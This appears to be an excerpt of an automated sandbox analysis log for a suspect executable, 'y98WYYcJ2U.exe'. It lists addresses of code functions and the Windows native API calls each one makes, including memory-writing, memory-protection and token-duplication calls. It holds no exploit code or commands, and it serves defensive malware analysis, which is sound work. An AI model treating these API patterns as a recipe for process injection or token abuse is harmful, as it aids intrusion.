Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72647770 RtlAcquireResourceShared,RtlAcquireResourceShared,ZwWaitForSingleObject,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlRaiseStatus,	0_2_72647770
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264A740 RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationThread,ZwClose,ZwClose,RtlImpersonateSelfEx,	0_2_7264A740
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D174B ZwSetInformationProcess,	0_2_726D174B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270675E ZwAllocateVirtualMemoryEx,	0_2_7270675E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72711746 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,	0_2_72711746
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A750 ZwCreateFile,	0_2_7268A750
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF752 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_726FF752
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B720 ZwQuerySecurityAttributesToken,	0_2_7268B720
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A720 ZwResumeThread,	0_2_7268A720
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D1724 ZwQueryInformationProcess,	0_2_726D1724
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF722 ZwQueryInformationProcess,RtlUniform,	0_2_726FF722
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264D730 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose,	0_2_7264D730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A730 ZwTerminateThread,	0_2_7268A730
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72672700 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,	0_2_72672700
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A700 ZwProtectVirtualMemory,	0_2_7268A700
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266B70C ZwSetInformationWorkerFactory,	0_2_7266B70C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271870A RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7271870A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A7E0 ZwTraceEvent,	0_2_7268A7E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B7E0 ZwRaiseException,	0_2_7268B7E0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FE7E6 memset,memset,memset,ZwQueryInstallUILanguage,ZwIsUILanguageComitted,RtlLCIDToCultureName,ZwQueryValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings,RtlInitUnicodeString,ZwQueryValueKey,ZwEnumerateValueKey,RtlCompareUnicodeStrings,RtlCompareUnicodeStrings,	0_2_726FE7E6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FB7FA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,	0_2_726FB7FA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B7F0 ZwRaiseHardError,	0_2_7268B7F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A7F0 ZwPowerInformation,	0_2_7268A7F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727187ED RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727187ED
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266F7F9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,	0_2_7266F7F9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B7C0 ZwQueryWnfStateNameInformation,	0_2_7268B7C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A7C0 ZwSetInformationObject,	0_2_7268A7C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF7D3 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_726FF7D3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D17AA ZwWaitForMultipleObjects,	0_2_726D17AA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A7B0 ZwWaitForMultipleObjects,	0_2_7268A7B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727007AD memset,ZwClose,ZwCreateSection,ZwMapViewOfSection,RtlDebugPrintTimes,ZwUnmapViewOfSection,ZwUnmapViewOfSection,ZwClose,	0_2_727007AD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72657781 ZwProtectVirtualMemory,	0_2_72657781
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D1783 ZwQueryInformationThread,	0_2_726D1783
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72665790 RtlNtStatusToDosError,RtlEnterCriticalSection,RtlNtStatusToDosError,RtlCompareMemoryUlong,DbgPrint,DbgPrint,DbgPrint,RtlpNotOwnerCriticalSection,memset,RtlFillMemoryUlong,RtlCompareMemoryUlong,DbgPrint,DbgPrint,DbgPrint,RtlFillMemoryUlong,RtlNtStatusToDosError,memset,RtlFillMemoryUlong,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,	0_2_72665790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B790 ZwQuerySystemInformationEx,	0_2_7268B790
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271878F RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7271878F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E460 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,	0_2_7264E460
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A470 ZwSetInformationFile,	0_2_7268A470
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267547E ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,	0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72718452 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72718452
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B440 RtlDestroyMemoryZone,RtlAcquireSRWLockExclusive,ZwFreeVirtualMemory,	0_2_7264B440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72647440 RtlProtectHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlProtectHeap,ZwQueryVirtualMemory,	0_2_72647440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642440 RtlDeleteTimerQueueEx,RtlAcquireSRWLockExclusive,TpTimerOutstandingCallbackCount,TpReleaseTimer,RtlDeleteTimerQueueEx,RtlDeleteTimerQueueEx,RtlDeleteTimerQueueEx,ZwWaitForAlertByThreadId,	0_2_72642440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A440 ZwOpenThreadToken,	0_2_7268A440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265044F ZwOpenKey,ZwClose,	0_2_7265044F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72688442 ZwAllocateVirtualMemory,memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,	0_2_72688442
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270145F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7270145F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72658457 RtlImageNtHeaderEx,ZwWow64IsProcessorFeaturePresent,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,	0_2_72658457
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267245F ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,	0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A450 ZwQueryInformationThread,	0_2_7268A450
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645420 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,	0_2_72645420
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265A423 RtlEnterCriticalSection,RtlAllocateHeap,RtlLeaveCriticalSection,RtlReAllocateHeap,RtlLeaveCriticalSection,ZwProtectVirtualMemory,RtlLeaveCriticalSection,	0_2_7265A423
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267242B ZwQueryVirtualMemory,	0_2_7267242B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A430 ZwQueryVirtualMemory,	0_2_7268A430
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D1408 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,	0_2_726D1408
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265740C ZwQueryPerformanceCounter,	0_2_7265740C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642416 ZwClose,RtlFreeHeap,	0_2_72642416
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270E407 ZwQueryVirtualMemory,ZwProtectVirtualMemory,	0_2_7270E407
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A410 ZwQueryInformationToken,	0_2_7268A410
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B410 ZwOpenProcessToken,	0_2_7268B410
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267341B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,	0_2_7267341B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FE4E9 memset,RtlInitUnicodeString,RtlInitUnicodeString,ZwEnumerateValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings,	0_2_726FE4E9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727164FB ZwQueryVolumeInformationFile,RtlAllocateHeap,ZwReadFile,ZwWriteFile,ZwSetInformationFile,RtlFreeHeap,RtlNtStatusToDosError,	0_2_727164FB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726474EA ZwQueryVirtualMemory,ZwProtectVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,	0_2_726474EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264E4F4 ZwEnumerateValueKey,	0_2_7264E4F4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A4F0 ZwOpenThreadTokenEx,	0_2_7268A4F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727014EC RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727014EC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D34C9 RtlAllocateHeap,ZwOpenKey,ZwClose,ZwQueryValueKey,RtlQueryEnvironmentVariable_U,ZwQueryValueKey,RtlExpandEnvironmentStrings_U,ZwEnumerateValueKey,RtlFreeHeap,RtlFreeHeap,	0_2_726D34C9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A4C0 ZwTerminateProcess,	0_2_7268A4C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726ED4C0 memset,RtlEnterCriticalSection,RtlLockHeap,RtlUnlockHeap,RtlLeaveCriticalSection,memset,ZwClose,ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwMapViewOfSection,RtlDebugPrintTimes,ZwUnmapViewOfSection,ZwClose,	0_2_726ED4C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727184CD RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727184CD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726504A0 RtlCheckTokenMembershipEx,ZwOpenThreadTokenEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwClose,RtlCreateSecurityDescriptor,RtlSetOwnerSecurityDescriptor,RtlSetGroupSecurityDescriptor,RtlCreateAcl,RtlInitializeSidEx,RtlSetDaclSecurityDescriptor,ZwAccessCheck,ZwClose,RtlInitializeSidEx,RtlCheckTokenMembershipEx,	0_2_726504A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A4A0 ZwUnmapViewOfSection,	0_2_7268A4A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726794B0 LdrpResGetMappingSize,RtlImageNtHeaderEx,ZwQueryVirtualMemory,LdrpResGetMappingSize,RtlGetCurrentServiceSessionId,LdrpResGetMappingSize,RtlGetCurrentServiceSessionId,	0_2_726794B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72657488 RtlAcquireSRWLockExclusive,RtlAllocateHeap,memcpy,ZwSetInformationProcess,RtlReleaseSRWLockExclusive,RtlAllocateHeap,RtlFreeHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,	0_2_72657488
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266D490 ZwReleaseWorkerFactoryWorker,_allshl,RtlAcquireSRWLockExclusive,memmove,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,	0_2_7266D490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D499 RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,	0_2_7267D499
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72646570 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,	0_2_72646570
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72715567 ZwDelayExecution,	0_2_72715567
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267A570 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,	0_2_7267A570
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A570 ZwOpenSection,	0_2_7268A570
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D9574 ZwSetInformationFile,	0_2_726D9574
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D154A memset,ZwQueryInformationProcess,RtlAllocateHeap,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,LdrQueryImageFileKeyOption,ZwClose,RtlFreeHeap,	0_2_726D154A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A540 ZwDelayExecution,	0_2_7268A540
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A550 ZwQueryDirectoryFile,	0_2_7268A550
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271454B RtlNtStatusToDosError,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,	0_2_7271454B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264D526 RtlInitUnicodeString,ZwOpenKey,ZwEnumerateKey,ZwClose,	0_2_7264D526
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267E52F ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap,	0_2_7267E52F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A530 ZwOpenFile,	0_2_7268A530
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271852B RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7271852B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271952E RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7271952E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265D500 RtlImageNtHeaderEx,RtlAddressInSectionTable,ZwUnmapViewOfSection,	0_2_7265D500
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266B500 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess,	0_2_7266B500
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A500 ZwOpenProcessTokenEx,	0_2_7268A500
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B500 ZwPrivilegeCheck,	0_2_7268B500
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A510 ZwQueryPerformanceCounter,	0_2_7268A510
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D1516 ZwFreeVirtualMemory,	0_2_726D1516
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F65EA ZwQueryVirtualMemory,bsearch_s,	0_2_726F65EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726805E1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,	0_2_726805E1
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726445F0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,	0_2_726445F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A5F0 ZwReadVirtualMemory,	0_2_7268A5F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727185EA RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727185EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B5C0 ZwWaitForKeyedEvent,	0_2_7264B5C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726CF5C8 memset,DbgPrint,DbgPrint,ZwProtectVirtualMemory,	0_2_726CF5C8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726495C0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads,	0_2_726495C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A5D0 ZwQueryAttributesFile,	0_2_7268A5D0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727105B3 ZwQueryVirtualMemory,ZwProtectVirtualMemory,	0_2_727105B3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A5A0 ZwWriteVirtualMemory,	0_2_7268A5A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726435B1 ZwSetInformationFile,	0_2_726435B1
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727015A8 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727015A8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726885B7 memset,memset,ZwQuerySystemInformation,ZwQueryInformationThread,ZwQueryInformationThread,ZwQuerySystemInformation,RtlAllocateHeap,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,memcpy,memcpy,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,memset,ZwWriteFile,RtlFreeHeap,ZwClose,ZwReadFile,ZwWriteFile,RtlQueryPerformanceCounter,RtlQueryPerformanceCounter,memcpy,ZwQueryVolumeInformationFile,ZwSetInformationFile,	0_2_726885B7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266C594 ZwCancelWaitCompletionPacket,	0_2_7266C594
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266F591 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,TpAllocWait,RtlAllocateHeap,ZwCreateWaitCompletionPacket,TpAllocWait,ZwClose,RtlFreeHeap,	0_2_7266F591
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A590 ZwFsControlFile,	0_2_7268A590
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72718589 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72718589
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B590 ZwQueryDebugFilterState,	0_2_7268B590
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267EA6E ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,	0_2_7267EA6E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266AA6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor,	0_2_7266AA6B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AA70 ZwAlpcQueryInformation,	0_2_7268AA70
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72644A40 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,	0_2_72644A40
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D0A2C ZwDuplicateObject,ZwDuplicateObject,	0_2_726D0A2C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72656A26 ZwOpenSection,RtlAppendUnicodeStringToString,RtlAppendUnicodeToString,RtlAppendUnicodeStringToString,RtlInitUnicodeStringEx,ZwClose,	0_2_72656A26
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72676A2B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,	0_2_72676A2B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264BA30 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose,	0_2_7264BA30
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72677A30 RtlQueryPerformanceCounter,_aullshr,RtlQueryPerformanceCounter,_allmul,_allmul,ZwQuerySystemInformationEx,_alloca_probe_16,ZwQuerySystemInformationEx,ZwQueryPerformanceCounter,	0_2_72677A30
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D2A09 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_726D2A09
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72664A10 ZwGetCurrentProcessorNumber,memset,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlGetCurrentServiceSessionId,RtlInterlockedPushListSList,	0_2_72664A10
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BA10 ZwSetCachedSigningLevel,	0_2_7268BA10
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271EA09 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,	0_2_7271EA09
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72680A17 ZwOpenKey,ZwCreateKey,	0_2_72680A17
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72705AF2 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwProtectVirtualMemory,	0_2_72705AF2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F5AE9 ZwOpenKey,ZwClose,ZwClose,	0_2_726F5AE9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FDAE9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap,	0_2_726FDAE9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AAE0 ZwAssociateWaitCompletionPacket,	0_2_7268AAE0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726BEAF1 ZwSetInformationObject,	0_2_726BEAF1
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726E4AF0 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess,	0_2_726E4AF0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72641AC0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,	0_2_72641AC0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AAC0 ZwAreMappedFilesTheSame,	0_2_7268AAC0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726BEAD9 ZwSetInformationThread,	0_2_726BEAD9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264EAA0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister,	0_2_7264EAA0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AAA0 ZwAlpcSendWaitReceivePort,	0_2_7268AAA0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F5AA2 ZwQueryInformationFile,	0_2_726F5AA2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726BEAB8 ZwSetInformationThread,	0_2_726BEAB8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AAB0 ZwAlpcSetInformation,	0_2_7268AAB0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BB60 ZwSetInformationVirtualMemory,	0_2_7268BB60
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BB70 ZwSetInformationWorkerFactory,	0_2_7268BB70
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266FB40 RtlDetermineDosPathNameType_U,RtlReleaseSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlDetermineDosPathNameType_U,RtlDllShutdownInProgress,ZwTerminateProcess,ZwWaitForAlertByThreadId,RtlGetCurrentServiceSessionId,RtlCreateUnicodeString,RtlCreateUnicodeString,RtlFreeUnicodeString,RtlFreeUnicodeString,	0_2_7266FB40
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72688B41 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwQueryValueKey,ZwClose,	0_2_72688B41
